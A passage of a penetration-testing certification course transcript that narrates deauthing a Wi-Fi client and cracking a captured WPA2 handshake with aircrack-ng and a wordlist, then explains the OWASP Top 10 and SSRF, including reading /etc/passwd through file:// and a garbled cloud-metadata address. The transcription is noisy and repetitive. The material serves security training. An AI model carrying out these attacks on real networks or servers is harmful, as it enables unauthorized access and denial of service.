it in. And that all looks good. And then I think we just tell it what device we want to use to actually do this, which will be our, I will need that. Okay, you can stop, Control C. And I can because I don't remember it. And I'm not typing it. I'm not going to put you people through that, right? And then, there we go, Control V. All right, so now we have all the things we need to make this happen. We should deauth this thing. And we should see this thing tell us, hey, I'm no longer connected to the wireless. Let's see if that happens. So I'm going to put my password straight because I should do this. Bing, it's sending deauths. And let's see here. I'm sure it will happen. I'm just waiting because I'll let you can see it. Let's see if it pops up. Sending that deauth. Hopefully it works. Usually I get the, oh yeah, I'm actually seeing it. Wi-Fi networks are open and available. It's giving me this, and it's connecting. You can't really see it, but it's connecting right now, and now it's disconnected. So we deauthed it for a moment in time, but that can allow me to do other things, maybe some spoofing or whatever I need to do, or just continue to denial service this device or other devices or multiple devices. You get the picture of why this is important. But there you go, that's a deauthentication attack.
All right, now you also have something about capturing handshakes. How is this useful for us?
So the handshakes are going to be helpful for us to actually start cracking the wireless device. So if it has some sort of encryption, that's going to be helpful for us there, is gathering that handshake information, the four-way handshake that occurs when a device pairs with an AP, right? If I can capture that, guess what goes along with that? All the encryption information. I can gather that encryption information, and that's going to help me start to gather more information, which will then allow me to use that information to crack the encryption if it's possible. Now, of course, there's different encryptions that are available. Some are weaker than others. You know, most common nowadays is most likely WPA2, which this device is using, and it is a fairly robust authentication mechanism, right? Encryption system. WPA3 much more robust, still has its flaws, but much more robust, not as easy. This device is WPA2, and like I said, it's probably the common one we're going to run into. But how do we do that, right? How do we capture that information? Well, I'm so glad you asked. We're going to, guess what? Run this again. Same thing, run the arrow dump. Now, anytime that a device connects, now I can wait for that. I can sit here and hold out and go, I can't wait for a four-way handshake. And it'll actually kind of show up in the top right-hand corner of this screen, right? But I can also force one by deauthing a device. So I'm going to deauth the device yet again. And you'll notice PMKID is found, and ultimately we should get handshake. If it's tells me four-way, there was a kind of flash really fast handshake was captured, right? There you go, WPA handshake. Now what I didn't do, what I should have done was capture that. This was just like in real time. So let's do it again. This time do it the right way. Hello, Control C. And we will actually output that W to wherever we want, which is called like capture.cam. Fire and forgets. Do the same old thing. Wait for that until we get that found, and then ultimately that should lead us to the promised land, which is that we get that. We're just gonna wait for that. I think I just saw flash. That's done. I should now have all these capture files, right? And this one is the most important one for us because now that we have that, we can use that to actually crack the password if it's possible. Now, if you're saying WPA2 is pretty robust, yeah, it is, but people tend to use bad passwords. It's just the name of the game. That's good for us as hackers, but bad for people in their security. Let's see if this is possible to be cracked. If we want to, we'll do air. Sudo air crack. This is where we actually use air crack NG. How about that? Let's see here. We will do dash A2 dash B, and this is where we get the BSSID, which I can grab from right here. Copy. Paste. Let's actually stop this file here. There we go. And then what else are we gonna do? We're gonna do a word list to help us start crank through these things. And I got rock you, so I'll do Bing. It is in documents. Rock text. And then last thing we're gonna do is just the cat file, which was we call capture. Cat. There we go. Fire away, and it actually really quickly cracked the password because the password is something simple, like Star Wars, right? That's not uncommon. You know, it's a really weak password. Absolutely. People use really weak passwords, and that's why we can crack them using things like AirCrack. But there you go. A little tour de force of AirCrack. Hopefully that helps you out understanding how you can do that.
Now, there's also some features on wireless that do something called WPS. How is that a bigger attack vulnerability?
So WPS is kind of an NFC type of technology. You kind of get your device close to the thing, and it uses NFC to give you wireless connectivity. It kind of auto-configs. They also have PIN numbers that can work with as well. They're weak. They're not very. There's not a lot of length, and therefore it can be easily brute forced. There's also some devices have a push button WPS. You walk up to the device, you hit WPS, and that uses that near field communications kind of and just configures, and you're connected. So if I have physical access to the device, I can connect to it. I'm on your network now, and that's bad for you. So WPS is a little kind of janky.
Okay. What about evil twin?
Evil twin attacks, right? So this is where I spin up another AP called built-in wireless, blah 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 blah, or ITProTV, right? It's the same thing. It's the same name. It's open, and if I can deauth or jam out the actual device, or I can overpower that device, the real device. I can act as an evil twin. People will connect, thinking it's the right device. I give them internet access, I let them go wherever they want, but I'm also gathering all the information that they're typing in and websites they're going to, all their posts and get requests and all that stuff that's going in between that. I now have access to it. So evil twins are very popular. You go to like a Starbucks Wi-Fi, I wouldn't trust that.
Yeah, now the other thing, since we actually talk about Wi-Fi, what about Bluetooth types of attacks? What can we expect there?
So Bluetooth, they have their own issues as well. I know we're kind of running out of time here, but the good news is we just kind of keep these. The Bluetooth attacks, you got to understand bluejacking, and this is where I'm able to actually send you messages via Bluetooth, and you have no idea where it comes from. And I do that by creating contacts. Instead of putting like name and number in that, I actually have a message, and I send it to you. Maybe that message is a link, maybe that's a whatever, and you follow it, you do whatever, and I'm able to advertise to you that way, whatever the case is, right? That's basic bluejacking. There's blue snarfing. It's not in the same way that it works, but it's actually the ability to connect to somebody's device via Bluetooth, read their contacts, email, all sorts of great stuff, basically have access to their mobile device and certain information inside of it. And that's not good. And they don't know that is happening. When you leave your device with Bluetooth on, you leave yourself open to these types of attacks. Bluetooth has inherent weaknesses. Others are like the BLE, the Bluetooth Low Energy. They open you up to things like man-in-the-middle attacks and spoofing attacks as well, because they have insecurities in the security systems that are built into them. Again, you don't need to be like a master at doing Bluetooth stuff. Be aware though of what bluejacking is, what blue snarfing is, and what BLE attacks are, sometimes called amplification attacks. Because of how that kind of thing works, weird things, I think one was called Blurtooth. Look at Blurtooth. That's an interesting BLE type of attack. Really cool stuff. Could probably give you a little more meat on the bone when it comes to understanding what BLE attacks are. Ultimately, they have inherent weaknesses in their security levels that can allow for things like man-in-the-middle.
All right, now last category here is RFID and NFC attacks. What are those?
Okay, RFID is a radio frequency identifying systems, and then NFC is the near field communications, which is built upon RFID. So a lot of the attacks to RFID kind of cross-pollinate and move down into NFC. So RFID, right? You ever pull out a badge, swipe it inside of a door, you got maybe a key fob or something, you get close to a panel, that panel reads the radio frequency communication off of the device, and if it's the right thing, as the database looks at, if the frequency and everything's correct, you're good to go. This is leading us open to people coming in with things like Proxmark here. All right, so here's the Proxmark website, and they make hardware for doing RFID cloning. They also make software for RFID cloning. This is great stuff. I would say relatively inexpensive, but for some people this might be a bit pricey for just testing and playing with. But if you have the means to kind of build a lab for RFID cloning, it's really cool technology, and it's not too difficult that you can get your mind wrapped around it and make it happen. And it can be very helpful on those red team engagements. We're trying to get into a physical site by swiping a badge or something like that. Using Proxmark technology can help you with that action. You close enough, and then that kind of takes the near field communications. Near field NFC is really close. You gotta be super close, right? This is kind of chip inside your credit cards and things. Get near the thing and it pays. Right, your phone gets near the thing, it's Apple Pay or Google Pay or whatever, and it pays for your drink or whatever it is, right? That is NFC at work. It's a really neat technology. It doesn't really have any built-in encryption though, a lot of times. So you can just read this stuff. And you can use antennas to increase the distance that you can be from that system and still pick up the communications and start to clone, man-in-the-middle, all sorts of great stuff, right? And that's what it all boils down to, is those technologies are open via those weaknesses that I can clone those technologies and then use them to gain access, perform things like payments, and that's why it's dangerous. But for us, it's something we need to be able to at least understand if we're going to be pen tester.
All right, well, that's a lot of great information when it comes down to wireless attacks. Let's go ahead and review those key points very quickly here. Right, these are some of the different attacks that we talked about, the different attack types, as well as Wi-Fi attacks, Bluetooth attacks, and RFID and near-field communication attacks. All these are actually going to be key when it comes down to different wireless attacks. Well, that'll also end our episode today here on CompTIA's PenTest Plus show, but there's another great episode coming up, and we'll see you. I'm talking about web. That's right, you have joined myself and, of course, Mr. Daniel Lowry as we get started here, taking a look at PenTest Plus, and we're getting into the idea of different security risks. And we're going to be talking about the OWASP Top 10. So, Daniel, help us out here. Maybe most people might not be familiar with this, they might have heard the term, but they're not exactly sure what it means and what does it actually do for us. So we're going to go through these, but can you help us out there? Why is it so important? That's right, you have joined myself and, of course, Mr. Daniel Lowry as we get started here, taking a look at PenTest Plus, and we're getting into the idea of different security risks. And we're going to be talking about the OWASP Top 10. So, Daniel, help us out here. Maybe most people might not be familiar with this, they might have heard the term, but they're not exactly sure what it means and what does it actually do for us. So we're going to go through these, but can you help us out there? Why is it so important?
Sure. So the reason this is so important is because, well, these are the top 10 web application security risks that you as a professional, a developer, anybody that is working with web applications, you really need to pay attention to this list because these are the most lobbed attacks or insecurities that we allow because of poor design or XYZ factors that we have to deal with. If we know about them beforehand, guess what? We can plan and prepare for them, and we like planning and preparing because that makes us less vulnerable, which is what this is all about at the end of the day. Now, as a red teamer or a pen tester, vulnerability assessor, knowing about this stuff will help you understand where the attacks are going to be coming from and therefore be able to emulate those threats a whole lot better, especially when you get into real threat modeling, where you're trying to specifically use a type of threat vectors and attacks that a specific type of APT would be using against a certain vendor or website or industry. Then you want to be able to go in that way to see how well they can be prepared against that, and just basically going against the top 10 here and seeing where they're falling short. That's what we're trying to do with pen testers, is help those defenders make sure that their defenses are actually working, and if they fall short, we can figure that out and help them redesign, re-implement, and see if we can make that better. Now, when it comes down to these risks, they're actually listed, like you said, top 10. Is number 10 like the most important one, or is it? So number 1 is the most important. Number 10 will be the least important. They're all important, which we but when I say important, what they mean is
severity or something.
Well, this is what we're seeing more of with the more severity. So there's a couple factors coming into play. You don't need to be able to like suss that out for the exam. You just need to be able to understand the top 10 list, what's on it, and understand those attacks that happen. Have some familiarity with that. But yeah, there's some scoring that goes into play to try to figure out what gets the number 1 spot, what's number 2, and so on and so forth. Now, this is not the first version of this. We are going to be working with the 2021 top 10 version, and OWASP has multiple top 10 versions for IoT and web and mobile and all sorts of different things. So if you're working in those spaces as well, you can check out OWASP. They're a great source of information for a lot of different vectors. But their claim to fame is going to be the web application security risks. The top 10 list on that one is the big dog in the block. So that's what we're taking a look at.
All right, so let's go ahead and begin with number 1 here, which is broken access control. What does that actually mean?
All right, broken access control. That's a great question. And guess what? You can follow along if you like and go to the OWASP webpage and see. Hey, there it is right there. Look at it at https://www-project-top-10// hashtag. Which is a fun thing. Anyway, this is really what we're looking for today. OWASP top 10. Kind of gives you some overview of that. You get a lot of information here as well. Before we get into number 1, actually, I do kind of want to, for just a second, I can get this little chart right here and see how things have changed from 2017 to 2021. Typically, this is on a 3-year rotation. Because of the pandemic, we had this good year. The thing slowed things down, as it did, right? And this was no exception. You can see some things kind of got moved up. Injection moved into 3. We saw broken off, moved down to 7. We got a couple of newbies on the block. Some things that got rolled into new things. So we're actually seeing some of these still. They're just under different categorizations. So if you're familiar with the older version, you might be like, hey, where's this, where's that? We'll see that as we move through. Now I just kind of want to give you that information. Let's move on to broken access control. Click on this link, and it'll give us much more information about what's going on here. So broken access control. Moving on from the fifth position. 94% of applications are tested from some form of broken access control. So what's access control? It's basically what are the permissions that Ronnie has to access X, Y, or Z in our web application, right? So when we say broken access control, we mean misconfigurations. Ronnie has more privileges than he should, or he's able to circumvent privileges. If he goes this way or that way, he actually finds himself with more privileges than he should have, and that's due to an implementation flaw, right? So that's really what we're talking about here. The overview is great, but really the description is what you want to sink your teeth into when it comes to what's going on here. The descriptions and then the examples are going to be great for you as well. So we'll take a look at these real quick, and we'll move on to number 2. Access control enforces policies such that users cannot act outside of their intended permissions, right? Pretty straightforward. Failure to typically lead to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside of the user's limits. We really don't like to do that. We want to stop that. You'll notice this is number 1. This is numero uno with a bullet. This is what we're seeing as more common than not anymore. So common access control vulnerabilities include, you can see permitting, viewing, or editing someone else's account. That sounds bad. Accessing API and missing access control for post instance. Let me tell you, I can put files on your website because you have to methods through your API. Oh, but I'm going to put files you don't like, and that's bad for you. So we definitely don't want that to happen. We have elevation privilege, metadata manipulation, such as replaying or tampering with JSON web tokens, also called JOTs, access control tokens, cookies, and hidden fields. So you're just getting way more access to things than you should have as an end user. I will tell you, when it comes to any application software, don't trust the user input. Just don't trust user input. Don't trust user input. Always prepare for user input to be not trusted. And here, if I allow a user access to something that they shouldn't have access to, they may also have input into that, which could further complicate things. Yeah, how to prevent. So if you're actually trying to prevent these things, that would be a good section. But then you have attack scenarios, right? The application uses unverified SQL or data in SQL call that is access to account information. Attacker simply modifies the account, and now you have access to the account that's not your account. Not good, right? Attacker simply forces browsers to target URLs. Admin rights are required for access to the admin page. So you're bypassing the admin pages and just gaining access to administrative areas. So there you go. There is broken access control.
All right, so let's talk about the second one here in our brief time. We have cryptographic failures.
Cryptographic failures. Oh, that never happens, right? Well, actually, it's probably happening a whole lot more than you'd like because it's number 2 here, right? So what do we mean by cryptographic failures? This means that we're either not implementing encryption at all, or we're using weak encryption. Okay, so that's basically what's going on here. We should see that. Reflected in the description for things to determine the protection needs of the data in transit and at best. Both important, right? Because things change when you move data around. It's the same thing. So you gotta be prepared for that. Examples are passwords, credit card numbers, health information, PII, business secrets require extra protection mainly if that data falls into privacy laws like EU, APR, or regulations, or financial data, right? So we want to make sure that these things are being encrypted in some way, shape, or form. And you can see there's some questions here they're asking. Is any data transmitted in clear text? If it is, I'm gonna go ahead and hold your hand up for me. No, don't do that. That's bad. That's wrong, right? This concerns protocols such as HTTP, SMTP, FTP, so on and so forth, and even TLS upgrades like Start TTLS, right? External internal traffic transfers. And you can see here it also says, are any old or weak cryptographic algorithms or protocols used either by default or in older code? And remember, things are changing. We're constantly shifting sand when it comes to our environments. So we have to be constantly reassessing what it is we're using, have new things come out. You can be secure today and wake up tomorrow insecure, right? That's a problem. That's what we're doing, right? So we're trying to figure out, so you gotta be prepared. Are default crypto keys used? Don't do that. Are using weak crypto keys or reused keys? Does everything have its own specific keys? Is proper key management being? You can start to see there's a lot involved in weak cryptography, right? It could be that we're just implementing it poorly or managing it poorly, and we allow credits to leak. Now, when I was over here sitting with my RSA keys just or my certificates for my website, just having a great time, right? That's not what we want. Okay, so plenty of stuff in here for us to understand about that. Obviously, it's probably I'm going to read this for you. Definitely go through here because this is a big one. We have to understand these things, and then of course go check out the example attack scenarios. Always like these because it adds context to what it is we're talking about with real life scenarios, right? An application encrypts credit card numbers in a database using automatic database encryption. Cool, encryption is being used. However, this data is automatically decrypted when retrieved, right? So data in transit, it is decrypted. This allows a SQL injective flaw that some attackers found to retrieve credit card numbers in clear text. So it's not being encrypted at every stage of its life, right? Again, you can go through and read more scenarios. Just want to give you that one there. All right, there's cryptographic flaws.
Our third one is going to be an injection.
Oh, this was my favorite. Yeah, right. This used to be number 1. This is 2017 number 1. It's still fun. We just got done talking about SQL injection, right? With the cryptographic flaw. Here we're seeing what the heck that actually is. What does that mean? Injection flaws are where I'm able, through input, in some way, shape, or form, it's the URL, some input field, or even hidden fields that you don't realize are viewable by the very industrious bad actor out there for looking for those fields, and they're able to inject extra information that then gets interpreted and run by the web app. Okay, let's see what they describe as. Let's see if I can give an app description here. So an application is vulnerable to attack when the user supplied data is not validated, filtered, or sanitized by the application. So you're starting to already see what can I do to stop this from happening? Well, you can validate, filter, or sanitize the input of the application. So do that. Dynamic queries are not parameterized. Again, it's another great way to stop this from happening. Make parameterized statements, prepared statements, and that way it doesn't matter what's put in there. Only the accept those. Yeah, it's only accept what it can accept. Hostile data is used within object relation mapping, search parameters to extract additional sensitive records. Hostile data is injected, is directly used or concatenated. Oh, I love concatenation. So much fun. It's a fun word to say. Say it with me. Concatenate. It's fun. What that just means is I'm taking two things. Right, I got two things. I put them together. Now, it's one thing. Interesting, huh? So that happens a lot. You can see the SQL or command contains the structure and malicious data and dynamic queries. Don't worry that we're not getting into this stuff right now. A lot of these we are going to show you in subsequent episodes. So right now, I just want you to be aware about the top 10 information. We're leaving that. Don't worry. We're going to look at SQL injection. We're going to do them. We're going to look at some other stuff that we've seen here as well. We're going to do that stuff. So fear not. Some of the more common, if that's that, are SQL, NoSQL, OS command injections. We're going to have some fun with that. Object relational mapping, LDAP expressions. LDAP and expression languages. EL, this is like Ognal. Yeah, there's right there. Injections. That was stress too. Yeah, it was an Ognal EL injection. That's what it was doing. Let's see here. So basically, you're seeing this. It is injecting that stuff into, and it's reading and going, oh, okay, you want me to read a file. Okay, I'll read that file. I can do that, and I will. And I was able to put that information into the input somehow, and it executed as if it were code or commands instead of just random data, right? That's the danger here. All right, attack scenarios, starting to see. This is all SQL queries. So SQL injection obviously being the number one for this. We also have HQL injection here. Similarly, you'll see here a couple others. Anyway, I'll let you go through that again, just because time is of the essence when it comes to this episode. So be prepared. Injection, pretty straightforward. I'm going to give you a command, I'm going to give you some code, I'm going to give you a query, and you're going to run it instead of just something that has certain things.
All right, so our next one is actually new to the list here, which is insecure design.
Insecure design. That's an interesting one because they're starting to comment things from a, hey, you know what? One of our biggest problems is that we're not designing systems with security in mind. That's a problem, and it leads to a bunch of insecurities. How about that? Who next? I'm flabbergasted. I'm too. Freaking out here. Of course, this makes total sense. I'm actually shocked that it's at number 4. I would think that this might even be higher because it allows for the things that we're seeing. Right? Insecure design is going to lead to insecurities. So what does it mean? All right, let's take a look at the page. And it's insecure design is a broad category. Okay, maybe that's why it's a little tougher to deal with. As representing different weaknesses expressed as missing or ineffective control design. Insecure design is not the source for all the other top 10 risks. Okay, so that's what we're saying. So since we're not, that's probably why we're sitting here before. Therefore, or there is a difference between insecure design and insecure implementation, which is true. Absolutely. We differentiate between design flaws and implementation defects for a reason. They have different root causes and different applications. So that's important distinction we make. What's going on here? A secure design can still have implementation defects leading to vulnerabilities that may be exploited. And insecure design cannot be fixed by perfect implementation. So this is very important information. That's kind of why I'm reading through this with you. Right? I hope you're seeing the distinctions that are being made here about design versus implementation. This is very important. Just because I have a perfect implementation of the software does not necessarily mean that the design is not flawed, right? And vice versa. Okay. One of the factors that contribute to insecure design is the lack of business risk profiling, and this is where you really need to pay attention. This is going to be the real crux of this issue. Inherent in software or systems being developed, and thus the failure to determine what level of security design is required. Right, so there's a lot of information about this, about what security design is, what that looks like, the methodology. Camp out on this section, understand this, and this will help us be able to tell the teams that are working on this what they need to be doing, like a software, a security development, secure SDLC. So get into that. I think they have a couple of tags. I'll let you kind of go through that. There you go, insecure design.
All right, so that actually is one that was previously on the list as well. Security misconfiguration.
Oh yeah, security misconfiguration. Doesn't love that. Good stuff. Right, this is where we just do something dumb. Right, we leave default creds, right? We don't change defaults. We don't do any system hardening. We are not configuring the system to be secure, right? And if I click on this, we'll take it there. Let's see here, description, right? Pretty straightforward, supported list of dumb stuff we do on a regular basis. And I say that tongue in cheek. A lot of times we get the done is better than perfect mentality going on because we have deadlines and things of that nature. So things get overlooked. We do things for speed and efficiency over security, and that just is life. But if we can employ more security, that will lead these things out, right? So missing appropriate security hardening, unnecessary features are enabled or disabled, default accounts and their passwords still enabled and unchanged. Error handling reveals too much information. Upgrade systems like security features are disabled and not configured securely. So there's a lot of configuration that we're just not going in and doing. Let's say your service not send security headers or directives, they're not set to secure values. The software is out of date or vulnerable. We're going to get to that a little bit here in just a second. You can have prevent. There's going to be some example scenarios. I'm a little short on time, so we're just going to hop away from that, but it's pretty straightforward. Make sure if there's security you can do that you are doing it.
All right, so that leads us to number 6, which is going to be our vulnerable and outdated components.
Yeah, man. So this used to be called using components with known vulnerabilities, but they changed a little bit to vulnerable and outdated components. We see that you're likely vulnerable if you not know the versions of all the components that you use.
Yeah.
Right? That means you don't understand your environment, and it's probably not getting updated, and therefore it could be at risk. Or you just installed something that has a risk already. Problem, right? If the software is vulnerable, unsupported, or out of date, you don't know that. This includes the OS, the web application server, excuse me, database management system, applications, APIs, all components. You understand there's a lot of moving parts to a web application, and you need to be making sure that all of those parts are up to snuff, right? So a lot of work on our end, absolutely. It's why defending systems is very difficult, and why we need to support those people that are doing that day in and day out as red teamers and pen testers to help them find where they missed something and go, hey, we found a problem. Let's get that fixed up and get you more secure, right? So again, walk through this list. It's a great list. It's pretty straightforward.
All right, so Daniel, that of course actually leads us to identification and authentication failures too.
Oh yeah, these are fun because what we're doing is we are taking advantage of the fact that the system is not properly vetting the user is who the user says they are, right? And the authentication is weak of some sort. So this is where we are able to brute force passwords, right? Doing things like credential stuffing and password spraying, or just good old-fashioned brute force attack methodologies. We're able to determine what user accounts are very easily. Maybe they're using emails. And they got a whole list of emails throughout their website. So now we got a list of users, or some other flaws allowing us to spoof or masquerade as another user. It's not verifying this. Okay. So let's see here the description. Right. Confirmation of user identity, authentication, and system management is critical to protect against authentication-related attacks. There may be authentication weaknesses if you permit automated attacks to credential stuffing, right? Where attackers list validation of passwords. Permit brute force or automated attacks from default well-known passwords like password 1 or admin. Right. This is getting even into cryptographic failures. Uses plain text, encrypted or weakly hashed passwords. I definitely bust that kind of stuff all the time. Well, it's MD5 encrypted. That's definitely not going to go crack that right now. Okay. Has missing or ineffective multi-factor authentication. That's a big one. Huge. That's a big one right there. Right. How big that?
It's really, it's
That's a little big. That's a little big. Right. Use multi-factor authentication, and when you do it, make sure that it is a good one and not some weak sauce that you found on the internet for your capture. Right. Do it right and have security. Right. A bunch of other stuff in here is a lot to go through, so make sure you camp out on this one in a hot minute. Because in practicum, this is something you could probably find pretty easily on a lot of web apps.
all right. Our 8th one is a new one to the list: software and data integrity failures.
Ooh, fun stuff here, right? Software and data integrity. Just jump right into the description. Software and data integrity failures relate to code and infrastructure that does not protect against integrity violations. Examples would be where an application relies upon plugins, libraries, or modules from untrusted sources. So let's keep going. Repositories and CDNs. Right. So we're kind of outsourcing things, and that can be an issue because now we're relying on them to do security well, and they're a part of our integration. Right. And we do see that an insecure CI/CD pipeline, continuous integration, continuous delivery, or design pipeline can introduce the potential for unauthorized access. Right. Now we're just discussing an attack that occurred due to this very thing, which was the SolarWinds attack of 2019, beginning of 2020. They were able to mess with some updates to the SolarWinds software. And that was a real problem for a lot of people, and you can imagine why. So making sure that not only are we designing our web application to be secure, but we're also vetting our supply chain to make sure that they have security in place and that they are doing testing and they have integrity as well, because they're a part of the show, so they have to play their parts. Right? Anything that you slap onto your application or bring into it is going to be a part of it that you need to be aware of.
All right, number 9 is security logging and monitoring failures.
Security logging and monitoring fails. So yeah, basically this is you're not doing that, or you're doing it really badly. Okay, so you must be logging, you must be monitoring, and you need to use some sort of system to aggregate and deliver that information in an effective way to your team. Okay, that's not happening. We as attackers can do stuff, and if let's say we're attacking Ronnie's web application, we're over here going attack, and Ronnie's going, "It is a beautiful day today. Nothing. The birds are singing. The sky is blue." But it's not. The sky is gray. There are storm clouds everywhere because we are going, oh, man, look at all this data. It's so much fun. Right. So real quick, let's look at their description. And it says, returning to OWASP top 10, again in 2021's categories, to help detect, escalate, and respond to active breaches, things that are happening bad. Without logging and monitoring, data breaches cannot be detected. Insufficient logging, detection, monitoring, and active response occurs anytime that these events that fail logs, right? We have to be looking at this. This is basically telling you the laundry list of where you might be failing at that. And so you can go back and wash it off because it's bad. Okay. So look at that. Of course, as always, look at these attack scenarios like a children's health plan provider, website operator couldn't detect a breach due to lack of monitoring and logging. So breaches occur. Ronnie, are you familiar with how long an average breach goes undetected?
I do not know how long.
200 days.
Oh, there you go.
200 days. Yeah,
That's a good portion of the year. Yeah, that's a good portion of the year.
That's a long time. All because, well, a lot of times because we don't have any kind of logging and monitoring systems in place that alerts to this, or we're doing it badly and ignoring the alerts. Right, there's a lot. You have to be looking to see if something bad happens.
All right, that leads us to our final one here, which is going to be server-side request forgery.
One of my favorites, actually. It's really cool. And really quickly, what this does is allows me, as the attacking end user, to get the web server to kind of like service requests that it didn't expect to do, like, hey, tell me if a port is open on your system. Right? Well, that's not what this is supposed to do. It's supposed to be retrieving web pages for me, right? Because that's a common thing in websites, right? Is because they're so kind of disjointed. Let the web app do the things for you. Like, oh, I'm going to reach out and grab some content, bring it back and deliver it to you as the end user. Cool. Can I manipulate that? That's what's going on with SSRF. So let's take a look at their description. We'll call it a day. SSRF flaws occur when a web application is fetching a remote resource without validating the user-supplied URL. It allows the attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall, VPN, or other type of network access controls. You start to see why I like this attack so much. Well, I mean, it's bad if it's happening to you, but as a pen tester, it's like, oh, sweet, your web app is making requests. Can I make it do things for me as well as service requests? That could be nice. Kind of gives you obviously more information about this being on the network there. Check this out. We're going to do an episode on SSRF, so I'll just show it to you. But there is a quick showing of you here in the attack scenarios. You can port scan internal servers. Like I said, hey, is that port open? Let me know, and it will. Attackers can access local files, right? So we love local file inclusion. That's always fun. So there's the attack right there. Build that out, see the file back. You need to look into cloud services by going after this 192.168.169.254.169. Kind of reveals my data about cloud stuff. So much fun. Insecure data all over the place. And thank you SSRF for making that available for us. So it's asking the server to make to do requests that weren't intended. Like, and the server does it, not you. You ask the server to do it, and the server does it instead of you directly trying to request a certain page. The server does it for you. SSRF.
All right, well, that's the OWASP top 10 that Daniel and I just kind of went through for you, and the descriptions as well as those scenarios. Make sure you check them out not only for the exam, but if you're going to be doing pen testing, this is a great way for you to actually see those scenarios and to actually be able to practice them as well. Well, that will wrap it up for us for this episode for PenTest Plus. That means there's more to come. So make sure you join us as we dive deep. That's right, we're taking that server-side request forwarding, and with me today, of course, is going to be Daniel Lowry as we begin a little bit of discussion and hopefully see a little demonstration on this as well. So, Daniel, when we get started, just in case it's been a few days, people may not actually watch everything in sequence the way we've done it.
It's true.
Let's kind of help them out. Can you go back and kind of help us out and remind us what server-side request forwarding is?
It could be a good place to start, Mr. Ronnie. I think it's a good idea. So what I've done is just kind of walk myself back to the OWASP top 10, found that SSRF number 10, I think, is on the list of the new 2021 version of the OWASP top 10 web app security risks. And let's say we take a look at that description because I think they do a really good job of explaining it, and we can discuss some of the particulars and see some of the attacking examples. So it says that an SSRF flaw occurs whenever a web application, hey, that's what we're looking at today, is fetching a remote resource. Okay. So remember, remote resource is anything that is not local to that system. It's out here, it's out there. Maybe I'm pulling content from other areas. Maybe I have multiple different servers within my network, or maybe I'm reaching something on the internet that has a resource, an image, or whatever, right? I could be doing that. That's what we mean by a remote resource. That's what I say. Go for it, I dare you. And then it says, but it's doing that without validating the user supplied URL. There we go again, trusting user input. If I'm putting things in the URL that allow me to, hey, reach out and grab something for me, then me as an end user, I can modify it. I can make changes to that and then submit it to my web server. And it's not validating that, going, is this something I expect to see? Or is someone getting silly, right? If that's what's happening, well, hopefully it is checking for that, and it sees the silliness and goes, no, that's not what I'm expecting. Please try again of the approved options, right? Okay, well, I'll try again. But if it doesn't check for that, well, who knows where we can go and what we can do with that. We might this allows an attacker coders the application to send a crafted request to an unexpected destination, even when protected by a firewall. It does go down good, because sometimes WAFs can be very limiting for us as pen testers, especially when we're going after web applications, stopping us. VPNs are another way we can get around, that we can get around, another thing we can get around, or another type of network access. So anything that's filtered and blocking, we might be able to circumvent those controls by using SSRF. All right, so let's see here. Now, I want to just make sure as a modern web application providing users features, fetching a URL becomes a common scenario. This does as a result, the incidence of SSRF is increasing. Also, the severity of SSRF is becoming higher due to cloud services and the complexity of architecture. So good information for us to figure out there. Ultimately, all this is to say is that I'm going to basically get the web server that's running the web application to make requests for me. Hence the idea of server side. So I'm going to send a URL, the server or the web application will bring the URL, and it's going to say, well, you know what, I'll get the server to try that for you. And it goes, oh, great, does it? Hopefully you get something in return that lets you know that you're susceptible to SSRF. Now, let's look at some of those attack scenarios, or examples as they give it. Example attack scenarios. So scenario 1, you can do port scanning of internal servers. Cool, like that. That's nice. The network architecture is unsegmented, which is a fat no. Ronnie, you're a network guy, right? You know we should be VLAN and that sort of things. No big flat maps, right?
Yeah, the more that everything is on one network, right, that means the more targets that there are for someone that's trying to attack it. So segmentation, network segmentation, reducing it down to exactly what it is, and putting the rules in place to prevent, again, cross, a VLAN hopping and stuff like that is actually good.
Yeah, absolutely. The man is on point. We need to make sure that our networks are segmented well, so that if I were able to do this attack, well, I would have a very limited scope, and it would be another hill I have to climb to go further into the network. Get into it. All right, let's see here. It says if network architecture is unsegmented, attackers can map out internal networks and determine ports open and closed on internal servers from connection results. So this is actually really cool. You now have an inside man or inside person, as it were. Who knows? Because they're on that inside the network, it's processing requests from users that are outside the network. Whoopsie daisy. Now we can actually look and see ports are open on different machines and find different machines.
So to try and put this in terms that I can make sure I'm understanding. So what we're saying is we're going to send this request to that web server, and the web server is going to do the port scanning for us. Is that what's going to happen?
Right, that's not kind of what's going to happen. That's exactly
what's going to happen.
Nailed it.
Okay.
Yes,
All right.
that server will scan for us. So instead of me scanning directly from my box trying to get into, well, I can't because that's a network I don't have available to me. You remember a lot of web applications running, again, you can if you chime in on this, are within the DMZ, right, the military zone. This is a hybrid area of untrusted, trusted devices. So because they make contact to an untrusted network, i.e. the internet, as well as trusted networks, i.e. their internal network. Right? So maybe there's a database back there that they need to reach into because it's a web application. Obviously, you want end users to be able to contact that from the internet, but you don't want to put sensitive resources in that area. Right? So you put that back on your internal network. You got this 1% in the middle allowing these conversations to occur. So that's exactly what we're going to do. We can use this to try to pivot into that network because it has access to it, whereas we do not. All right, let's look at another one we got here. Sensitive data exposure. Attackers can access local files such as or internal services. I like that, such as. It's like that was an incomplete sentence. Good job, Watch. Hey, it's a free service. We can't complain too much, right? Gain sensitive information such as file. So this is instead of doing HTTP:// you're doing file://. If you've ever done like a Control O on your web browser, it will try to open local files. Local HTML file, it'll open that up and show it to you in HTML, PHP files, or even Markdown, or even text files. Honestly, your browser can actually read a lot of things and display that information for you. So I can use that file:// to read like etsy password, right? And then scenario 3, they have actually 4 access metadata of storage, cloud storage, and within scenario 4 is compromised internal services. The attacker can abuse internal services to conduct further attacks, such as remote code execution denial service. That would have to take some infrastructure and just the right amount of stars aligning and planets in the right spot for that kind of thing to occur. But if you do find that, you could possibly find yourself. So that's what we're talking about. Hopefully you understand the concept now behind an SSRF, because that's what's important to understand. Make sure you know what is happening in the attack chain.
All right, so Daniel, can you help us out here with an example of how we might be able to do something?
